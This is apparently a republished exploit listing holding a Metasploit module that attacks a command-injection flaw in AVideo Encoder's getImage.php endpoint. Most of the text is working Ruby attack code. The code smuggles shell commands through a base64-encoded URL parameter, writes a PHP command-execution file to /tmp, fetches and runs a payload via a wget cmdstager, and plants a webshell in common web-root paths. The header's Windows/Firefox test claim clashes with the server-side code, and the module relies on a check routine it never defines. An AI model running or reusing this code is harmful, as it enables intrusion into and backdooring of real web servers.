Share
## https://sploitus.com/exploit?id=PACKETSTORM:217619
======================================================================================================================
| # Title : AVideo versions prior to 7.0 Metasploit Module Command Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.avideo.com/ |
======================================================================================================================
[+] Summary : The Metasploit exploit module targets a command injection vulnerability in AVideo
This module exploits a base64-encoded command injection flaw in AVideo Encoderβs image processing endpoint, turning a simple URL parameter into remote code execution with multiple payload strategies.
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'AVideo Encoder getImage.php Command Injection',
'Description' => %q{
Command injection in AVideo via base64Url parameter.
},
'Author' => ['indoushka'],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux', 'php'],
'Arch' => [ARCH_CMD, ARCH_PHP, ARCH_X86, ARCH_X64],
'Targets' => [
['Unix Command', { 'Type' => :unix_cmd }],
['PHP Command', { 'Type' => :php_cmd }],
['Linux Dropper',{ 'Type' => :linux_dropper }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-10-15'
))
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptInt.new('TIMEOUT', [true, 'Timeout', 10]),
OptString.new('WEBSHELL_NAME', [false, 'Webshell name', 'shell.php']),
OptBool.new('UPLOAD_WEBSHELL', [false, 'Upload webshell', false])
])
register_advanced_options([
OptInt.new('Delay', [false, 'Delay', 1])
])
end
def execute_command(cmd)
payload = build_payload(cmd)
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'Encoder', 'objects', 'getImage.php'),
'vars_get' => {
'base64Url' => payload,
'format' => 'png'
},
'timeout' => datastore['TIMEOUT']
})
return res&.body
rescue ::Rex::ConnectionError
return nil
end
end
def build_payload(cmd)
injected = "http://test.com/`#{cmd}`"
Rex::Text.encode_base64(injected)
end
def exploit
unless datastore['ForceExploit'] || check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, 'Target not vulnerable')
end
print_status("Exploiting...")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :php_cmd
execute_php_payload
when :linux_dropper
execute_cmdstager
end
upload_webshell if datastore['UPLOAD_WEBSHELL']
end
def execute_php_payload
print_status("Executing PHP payload...")
php_code = "<?php system($_GET['cmd']); ?>"
tmp_file = "/tmp/#{Rex::Text.rand_text_alpha(6)}.php"
execute_command("echo '#{php_code}' > #{tmp_file}")
register_file_for_cleanup(tmp_file)
sleep(datastore['Delay'])
execute_command("php #{tmp_file}")
end
def execute_cmdstager
print_status("Running cmdstager...")
super(
:delay => datastore['Delay'],
:flavor => :wget,
:temp => '/tmp'
)
end
def upload_webshell
print_status("Uploading webshell...")
webshell = datastore['WEBSHELL_NAME']
code = "<?php system($_GET['cmd']); ?>"
paths = [
datastore['WritablePath'],
'/var/www/html/',
'/var/www/',
'./'
]
paths.each do |p|
next if p.nil? || p.empty?
path = p.end_with?('/') ? p : p + '/'
execute_command("echo '#{code}' > #{path}#{webshell}")
sleep(datastore['Delay'])
res = execute_command("ls #{path}#{webshell}")
if res && !res.include?("No such file")
print_good("Webshell likely uploaded: #{path}#{webshell}")
break
end
end
end
def print_status(msg)
super("[AVideo] #{msg}")
end
def print_good(msg)
super("[AVideo] #{msg}")
end
def print_error(msg)
super("[AVideo] #{msg}")
end
def print_warning(msg)
super("[AVideo] #{msg}")
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================